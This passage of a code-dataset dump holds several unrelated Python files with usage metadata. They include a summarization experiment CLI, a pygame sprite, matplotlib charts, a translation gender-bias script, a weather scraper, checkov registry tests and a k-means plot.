"call"}, {"api_name": "math.radians", "line_number": 355, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 356, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 356, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 356, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 357, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 357, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 357, "usage_type": "call"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 359, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 369, "usage_type": "attribute"}, {"api_name": "cv2.floodFill", "line_number": 374, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 382, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 383, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 390, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 392, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 395, "usage_type": "call"}, {"api_name": "cv2.getAffineTransform", "line_number": 396, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 419, "usage_type": "call"}]} +{"seq_id": "286952959", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Conduct experiments using sume.\"\"\"\n\n\nimport argparse\nimport datetime\nimport json\nimport logging\nimport logging.config\nimport multiprocessing\nimport os\nimport pathlib\nimport queue\n\nimport fastText\nimport nltk\nimport numpy\nimport spacy\nimport yaml\n\nfrom . import inputs\nfrom . import summarizers\nfrom . 
import rouge\n\n# from sume.models.entropy_summarizer import EntropySummarizer\nlogger = logging.getLogger(__name__)\n\n\ndef setup_logging(default_path: str = 'logging.yml',\n default_level: int = logging.INFO,\n env_key: str = 'LOG_CFG') -> None:\n \"\"\"Configure logging.\"\"\"\n path = default_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n with open(path, 'r') as fh:\n config = yaml.safe_load(fh.read())\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n\n\ndef main() -> None:\n \"\"\"CLI Entry point.\"\"\"\n\n # setup logging\n setup_logging()\n\n # define the CLI\n parser = argparse.ArgumentParser(description='Experiment with sume.')\n parser.add_argument(\n 'method',\n choices=['dwmd', 'wwmd', 'ilp'],\n help='which method to summarize with')\n parser.add_argument(\n '--model',\n default='models/duc.bin',\n help='which fasttext model to use')\n parser.add_argument(\n '--workers',\n type=int,\n default=multiprocessing.cpu_count(),\n help='number of cores to use')\n args = parser.parse_args()\n data_dir = os.path.join('data', 'duc2004')\n run_name_suffix = '-' + datetime.datetime.now() \\\n .strftime('%m-%dT%H:%M:%S')\n run_name = args.method + run_name_suffix\n output_dir = os.path.join('output', run_name)\n models_dir = os.path.join(data_dir, 'models')\n system_peers_dir = os.path.join(data_dir, 'sys-peers')\n documents_dir = os.path.join(data_dir, 'documents')\n peers_dir = os.path.join(output_dir, 'peers')\n rouge_config = os.path.join(output_dir, 'rouge-config.xml')\n\n rouge_err = os.path.join(output_dir, 'rouge.err')\n rouge_data = os.path.join('rouge', 'data')\n rouge_args = ['-n', '4',\n '-m',\n '-l', '100',\n '-x',\n '-c', '95',\n '-r', '1000',\n '-f', 'A',\n '-p', '0.5',\n '-t', '0',\n '-d']\n output_file = os.path.join(output_dir, 'results.json')\n\n # download required spacy models and nltk corpora if they are not present\n spacy.cli.download('en_core_web_sm')\n nltk.download('stopwords')\n\n # setup output directory\n pathlib.Path(peers_dir).mkdir(parents=True, exist_ok=True)\n\n data = inputs.get_duc_input(documents_dir,\n models_dir,\n system_peers_dir)\n\n if args.method in ['dwmd', 'wwmd']:\n model = fastText.load_model(args.model)\n\n def embeddings(word: str) -> numpy.ndarray:\n return model.get_word_vector(word)\n\n if args.method == 'dwmd':\n wrapper = summarizers.WMDWrapper(embeddings, '.tokens')\n elif args.method == 'wwmd':\n wrapper = summarizers.WMDWeightsWrapper(embeddings, '.tokens')\n\n elif args.method == 'ilp':\n nltk.download('stopwords')\n wrapper = summarizers.ILPWrapper('.tokens', n=2, stemming=True,\n mininum_sentence_length=2,\n remove_citations=True,\n remove_redundancy=True)\n tasks = multiprocessing.Queue()\n for id, (documents, _, _) in data.items():\n tasks.put((id, documents))\n workers = [Worker(wrapper, tasks, peers_dir, logger)\n for _ in range(args.workers)]\n for worker in workers:\n worker.start()\n for worker in workers:\n worker.join()\n\n rouge.write_config(data,\n peers_dir,\n rouge_config)\n rouge.run(os.path.join('rouge', 'ROUGE-1.5.5.pl'),\n rouge_data,\n rouge_args,\n rouge_config,\n os.path.join(output_dir, 'rouge.out'),\n rouge_err)\n results = rouge.parse(os.path.join(output_dir, 'rouge.out'))\n with open(output_file, 'w', encoding='utf-8') as fh:\n json.dump(results, fh)\n logger.info('average ROUGE-2 recall is {:.3f} ({:.3f}, {:.3f})'.format(\n *results['R']['2']))\n\n\nclass Worker(multiprocessing.Process):\n\n def __init__(self, wrapper: 
summarizers.SummarizerWrapper,\n tasks: multiprocessing.Queue, peers_dir: str,\n logger: logging.Logger) -> None:\n super().__init__()\n self.wrapper = wrapper\n self.tasks = tasks\n self.peers_dir = peers_dir\n self.logger = logger\n\n def run(self) -> None:\n while True:\n try:\n task = self.tasks.get_nowait()\n except queue.Empty:\n break\n id, documents = task\n\n self.logger.info('processing directory {}'.format(documents))\n summary = self.wrapper.summarize(documents)\n summarizers.write_summary(self.peers_dir, id, summary)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "sumexp/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.config.dictConfig", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 43, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 53, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "spacy.cli.download", "line_number": 94, "usage_type": "call"}, {"api_name": "spacy.cli", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nltk.download", "line_number": 95, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 98, "usage_type": "call"}, {"api_name": "fastText.load_model", 
"line_number": 105, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 107, "usage_type": "attribute"}, {"api_name": "nltk.download", "line_number": 116, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 147, "usage_type": "attribute"}, {"api_name": "multiprocessing.Queue", "line_number": 150, "usage_type": "attribute"}, {"api_name": "logging.Logger", "line_number": 151, "usage_type": "attribute"}, {"api_name": "queue.Empty", "line_number": 162, "usage_type": "attribute"}]} +{"seq_id": "546135029", "text": "import pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n \"\"\" A Class to manage bullets fired from the rocket\"\"\"\n\n def __init__(self, ai_settings, screen, rocket):\n \"\"\" Create a bullet object at the ship's current position\"\"\"\n # Inherit the __init__ function from the Spirte parent class\n super().__init__()\n self.screen = screen\n\n # Create a bullet rect at (0,0) and then set correct position\n self.rect = pygame.Rect(0,0, ai_settings.bullet_width,\n ai_settings.bullet_height)\n self.rect.centery = rocket.center\n self.rect.centerx = rocket.rect.right\n\n\n # Store the bullets position as a decimal value\n self.x = float(self.rect.x)\n\n self.color = ai_settings.bullet_color\n self.speed_factor = ai_settings.bullet_speed_factor\n\n def update(self):\n \"\"\"Move the bullet across the sreen.\"\"\"\n self.x += self.speed_factor\n # Update the rect position\n self.rect.x = self.x\n\n def draw_bullet(self):\n \"\"\" Draw the bullet to the screen\"\"\"\n pygame.draw.rect(self.screen, self.color, self.rect)", "sub_path": "exercises/12-5.Sideways_Shooter/bullet.py", "file_name": "bullet.py", "file_ext": "py", "file_size_in_byte": 1143, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pygame.sprite.Sprite", "line_number": 4, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "154228029", "text": "import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nstar_data = pd.read_csv(\"habitable_star_data.csv\")\r\n\r\nstar_name = star_data[\"Star Name\"]\r\ndistance = star_data[\"Distance (ly)\"]\r\nmass = star_data[\"Mass (M☉)\"]\r\nradius = star_data[\"Radius (R☉)\"]\r\ngravity = star_data[\"Surface Gravity (m/s²)\"]\r\n\r\nplt.figure()\r\nplt.bar(star_name, mass)\r\nplt.xlabel(\"Star Names\")\r\nplt.ylabel(\"Mass of Stars\")\r\nplt.title(\"Star Name vs Mass\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.figure()\r\nplt.bar(star_name, radius)\r\nplt.xlabel(\"Star Names\")\r\nplt.ylabel(\"Radius of Stars\")\r\nplt.title(\"Star Name vs Radius\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.figure()\r\nplt.bar(star_name, distance)\r\nplt.xlabel(\"Star 
Names\")\r\nplt.ylabel(\"Distance of Stars\")\r\nplt.title(\"Star Name vs Distance\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.figure()\r\nplt.bar(star_name, gravity)\r\nplt.xlabel(\"Star Names\")\r\nplt.ylabel(\"Gravity of Stars\")\r\nplt.title(\"Star Name vs Gravity\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.show()", "sub_path": "charts.py", "file_name": "charts.py", "file_ext": "py", "file_size_in_byte": 966, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 33, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "269368203", "text": "# This code is a modified version of https://github.com/marceloprates/Gender-\n# Bias/blob/master/gender-bias.py. Currently, the code has been modified to\n# remove all sections related to adjective translation and update occupation\n# sections to fields of study (FOS). It was last modified on 10/13/19 by \n# Katy Mitchell, (kmitch64@uncc.edu) for ITCS 5111: Introduction to Natural \n# Language Processing\n\n\nimport sys\nfrom googletrans import Translator\nfrom googletrans import LANGUAGES\nfrom xpinyin import Pinyin\nimport csv\nimport numpy as np\n\n\n# Define function to obtain the translated gender of a field of study (FOS) in a given language (through Google Translate)\ndef get_gender(language, fos=None, case=None):\n\n field_of_study_dict = dict()\n field_of_study_dict['Malay'] = 'dia adalah %s' #change to education\n field_of_study_dict['Estonian'] = 'ta on %s' #change to education\n field_of_study_dict['Swahili'] = 'yeye ni %s' #change to education\n if fos is not None:\n phrase = field_of_study_dict[language] % fos\n else:\n raise Exception(\"Field of study has not been provided\")\n # end if\n\n try:\n translation = translator.translate(phrase, src=language, dest='en').text\n translation = translation.lower()\n print(\"Language: {} | Phrase: {} | Translation: {}\".format(language, phrase, translation))\n \n female_markers = [\"she\", \"she's\", \"her\"]\n male_markers = [\"he\", \"he's\", \"his\"]\n neuter_markers = [\"it\", \"it's\", \"its\", \"they\", \"they're\", \"them\", \"who\", \"this\", \"that\"]\n \n has_any = lambda markers, translation: any([ marker.lower() in translation.lower().split() for marker in markers ])\n\n if(has_any(female_markers, translation) or translation[0:10].find(\"that woman\") != -1):\n return 'Female' # Suggestion: (1,0,0)\n elif(has_any(male_markers, translation) or translation[0:8].find(\"that man\") != -1):\n return 'Male' # Suggestion: (0,1,0)\n elif(has_any(neuter_markers, translation)):\n return 'Neutral' # Suggestion: (0,0,1)\n else:\n return '?'\n except:\n return '?'\n # end try\n# end def\n\n\ntranslator = Translator()\np = Pinyin()\n\ndo_fos = \"fos\" in sys.argv\n\n# Get language list\nlanguages = []\nwith open('/Users/katymitchell/Documents/GitHub/Gender-Bias/languages.csv', 'r') as f:\n f.readline()\n for line in f:\n language, family, pronomial_gender_system, supported = line.split(\";\")\n if(pronomial_gender_system != 'Yes' and supported.rstrip() == 'Yes'):\n languages.append(language)\n# end with\n\n# 
The remainder of this code needs to be modified to use NCES files\nif do_fos:\n # Read FOS list into table\n fos_table = np.array(list(csv.reader(open('jobs/bureau_of_labor_statistics_profession_list_gender_filtered_expanded.tsv', 'r'), delimiter='\\t')))\n # Compute list of categories\n categories = list(set(fos_table[1:, -3]))\n # Get dictionary of category -> jobs (jobs per category)\n categories_dict = dict([ (category, fos_table[fos_table[:, -3] == category, 0]) for category in categories ])\n# end if\n\n\"\"\"\n Create a fos_table with the translated version (provided by Google Translate) of each field of study,\n in the following structure:\n 1. Each line corresponds to a single FOS\n 2. The following 3 columns give a translated version of that FOS for each of the three languages\n\"\"\"\nif False and do_fos:\n with open(\"Results/jobs-translations.tsv\", \"w\") as output:\n \n # Write header\n # First column is category\n output.write(\"Category\")\n # Then follows one column per language\n output.write(\"\\tEnglish\")\n for language in languages:\n output.write('\\t' + language)\n # end for\n output.write('\\n')\n\n# need to modify to use without categories\n\n # Now iterate over all categories\n for category in categories:\n print(\"Translating occupations from category {} ...\".format(category))\n # Get all jobs for this category\n for fos in categories_dict[category]:\n print(\"\\tTranslating occupation \\\"{}\\\" ...\".format(fos))\n output.write(category)\n output.write('\\t' + fos)\n # For each language L in our list, translate 'job' from English to L\n for language in languages:\n try:\n translated_fos = (translator.translate(fos.rstrip().lower(), src='en', dest=language).text).lower()\n except Exception:\n print(\"\\tCould not translate FOS %s to language %s\" % (fos.rstrip(), language))\n translated_fos = \"?\"\n # end try\n output.write('\\t' + translated_fos)\n # end for\n output.write('\\n')\n # end for\n # end for\n # end with\n# end if\n\n\"\"\"\n Now create the per-language gender table\n\"\"\"\n\nif do_fos:\n # Get table with one FOS for row, translated to every language (one per column)\n translated_fos = list(csv.reader(open('Results/jobs-translations.tsv', 'r'), delimiter='\\t'))\n with open('Results/job-genders.tsv', 'w') as output:\n # Write header\n output.write(\"Category\")\n output.write(\"\\tField of Study\")\n for language in languages:\n output.write('\\t' + language)\n # end for\n output.write('\\n')\n\n for entry in translated_fos[1:]:\n \n category = entry[0]\n english_name = entry[1]\n foreign_names = entry[2:]\n\n print(\"Translating field of study \\\"{}\\\" ...\".format(english_name))\n\n output.write(category)\n output.write('\\t' + english_name)\n\n for (language, foreign_name) in zip(languages, foreign_names):\n gender = get_gender(language, fos=foreign_name)\n output.write('\\t%s' % gender)\n # end if\n # end if\n # end for\n\n output.write('\\n')\n output.flush()\n # end for\n # end with\n# end if\n", "sub_path": "gender-bias.py", "file_name": "gender-bias.py", "file_ext": "py", "file_size_in_byte": 6134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "googletrans.Translator", "line_number": 55, "usage_type": "call"}, {"api_name": "xpinyin.Pinyin", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 73, "usage_type": 
"call"}, {"api_name": "csv.reader", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "247083170", "text": "from bs4 import BeautifulSoup\nimport requests\nfrom weather_crawler import mysqlConn\n\n\ndef scrape_past(city_code):\n print(\"【数据源】:https://weather.com/zh-CN/weather/monthly/l/CHXX\" + city_code + \":1:CH\")\n print(\"--获取数据源...\")\n # 数据源\n source = requests.get('https://weather.com/zh-CN/weather/monthly/l/CHXX' + city_code + ':1:CH').text\n print(\"--数据源获取成功!\\n\")\n soup = BeautifulSoup(source, 'lxml')\n\n # 定位元素\n print(\"--定位元素中...\")\n # weather_today = soup.find('div', class_='dayCell selected')\n weather_past = soup.find_all('div', class_='dayCell opaque')\n # weather_future = soup.select('div[class=\"dayCell\"]')\n print(\"--元素定位完毕!\\n\")\n\n # 将三块信息合并到一个列表\n weather_month = []\n weather_month.extend(weather_past)\n # weather_month.append(weather_today)\n # weather_month.extend(weather_future)\n # for item in weather_month:\n # print(item.prettify())\n\n # 查询城市\n city_text = soup.find('div', class_='locations-title monthly-page-title').h1.text\n city = city_text[0:-8]\n\n # 查询日所在月份\n month_selected = soup.find('select', id='month-picker')['value']\n month = int(month_selected[6:7])\n\n # 计算表中上个月的天数\n today = int(month_selected[8:10])\n len_past_month = weather_past.__len__() - today + 1\n\n # 集合多天数据\n weather_data_past = []\n i = 0\n print(\"--多天数据融合中...\")\n for item in weather_past:\n\n # 日期\n day = item.div.text\n\n # 判断日期是否属于上个月\n if i < len_past_month:\n date = str(month-1) + \"月 \" + day + \"日\"\n else:\n date = str(month) + \"月 \" + day + \"日\"\n\n # 最高温度/最低温度\n hi = item.find('div', class_='temp hi').text\n lo = item.find('div', class_='temp low').text\n hi_lo = hi + '/' + lo\n\n # 天气描述\n description = \"/\"\n # 降雨概率\n rainfall_probability = \"/\"\n # 风力\n wind = \"/\"\n # 湿度\n humidity = \"/\"\n\n weather_data_past.append((city, date, description, hi_lo, rainfall_probability, wind, humidity))\n i += 1\n print(\"--多天数据融合完毕!\\n\")\n\n print(\"【查询城市】:\" + city)\n print(\"【查询时间】:\" + month_selected)\n print(\"【表中上月天数】:\" + str(len_past_month))\n\n # 存储数据\n print(\"\\n--数据存储中...\\n\")\n mysqlConn.save_to_mysql(weather_data_past)\n print(\"--数据存储完毕!\\n\")\n", "sub_path": "weather_crawler/scrape_weather_past.py", "file_name": "scrape_weather_past.py", "file_ext": "py", "file_size_in_byte": 2593, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 12, "usage_type": "call"}, {"api_name": "weather_crawler.mysqlConn.save_to_mysql", "line_number": 80, "usage_type": "call"}, {"api_name": "weather_crawler.mysqlConn", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "211181421", "text": "import os\nimport unittest\nfrom unittest.mock import patch\n\n\nclass TestRegistry(unittest.TestCase):\n\n def setUp(self):\n from checkov.terraform.checks.module.registry import module_registry\n self.registry = module_registry\n\n @patch('os.path.exists')\n def test_with_init(self, mock_path_exists):\n mock_path_exists.return_value = True\n self.assertTrue(self.registry._directory_has_init_py(\"/foo/bar\"))\n\n @patch('os.path.exists')\n def test_without_init(self, mock_path_exists):\n mock_path_exists.return_value = False\n self.assertFalse(self.registry._directory_has_init_py(\"/foo/bar\"))\n\n def test_registry_external_check_load(self):\n current_dir = os.path.dirname(os.path.realpath(__file__))\n 
external_dir = current_dir + \"/example_external_dir/extra_checks\"\n self.registry.load_external_checks(external_dir)\n\n external_check_loaded = False\n external_check = None\n for check in self.registry.checks['module']:\n if check.__class__.__name__ == 'ModuleCheck':\n external_check_loaded = True\n external_check = check\n self.assertTrue(external_check_loaded)\n self.registry.checks['module'].remove(external_check)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests/terraform/checks/module/registry/test_registry.py", "file_name": "test_registry.py", "file_ext": "py", "file_size_in_byte": 1306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "checkov.terraform.checks.module.registry.module_registry", "line_number": 10, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 23, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "354785747", "text": "from copy import deepcopy\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nfrom matplotlib import pyplot as plt\nimport functions as func\n\n#import the dataset\n# Pandas dataframe\ndata = pd.read_csv(\"InsuranceUserData.csv\")\nprint(data.shape)\ndata.head()\nheaders = list(data.columns)\nprint(headers)\n# will depend on age range the user gives\n# NumPy representation of the Series object\nnum_prescriptions_col = data['NumPrescriptions'].values\nage_range_col = data[\"AgeRange\"].values\nprint(\"prescriptions column\")\nprint(num_prescriptions_col)\nprint(\"Age Range\")\nprint(age_range_col)\n\nplt.rcParams['figure.figsize'] = (16,9)\nplt.style.use('ggplot')\n\nX = np.array(list(zip(num_prescriptions_col, age_range_col)))\nplt.scatter(num_prescriptions_col, age_range_col, c='black', s=7)\nplt.show()\n\"\"\"\n# number of clusters\nk = 3\n# x coordinates of random centroids\nC_x = np.random.randint(0, np.max(X)-20, size=k)\n# y coordinates of random centroids\nC_y = np.random.randint(0, np.max(X)-20, size=k)\nC = np.array(list(zip(C_x, C_y)), dtype=np.float32)\nprint(C)\n\nplt.scatter(price_col, ehb_percentage_col, c='#050505', s=7)\nplt.scatter(C_x, C_y, marker='*', s=200, c='g')\nplt.show()\n\n# To store the values of centroids when it updates\nC_old = np.zeros(C.shape)\n# Cluster labels\nclusters = np.zeros(len(X))\n\n# error function - distance between new centroids and old centroids\nerror = func.dist(C, C_old, None)\n\n# Loop will run until the error becomes 0\nwhile error != 0:\n # Assigning each value to its closest cluster\n for i in range(len(X)):\n distances = func.dist(X[i], C)\n cluster = np.argmin(distances)\n clusters[i] = cluster\n # Storing the old centroid values\n C_old = deepcopy(C)\n # Finding the new centroids by taking the average value\n for i in range(k):\n points = [X[j] for j in range(len(X)) if clusters[j] == i]\n C[i] = np.mean(points, axis=0)\n error = func.dist(C, C_old, None)\n\ncolors = ['r', 'g', 'b', 'y', 'c', 'm']\nfig, ax = plt.subplots()\nfor i in range(k):\n points = np.array([X[j] for j in range(len(X)) if clusters[j] == i])\n 
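# draw the points assigned to cluster i in that cluster's color\n    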
ax.scatter(points[:, 0], points[:, 1], s=7, c=colors[i])\nax.scatter(C[:, 0], C[:, 1], marker=\"*\", s=200, c='#050505')\nplt.show() \n\"\"\"\n\n", "sub_path": "insurance_kmeans.py", "file_name": "insurance_kmeans.py", "file_ext": "py", "file_size_in_byte": 2248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 25, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "147062313", "text": "from sqlalchemy import Column, Integer, Float, Date, String\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import 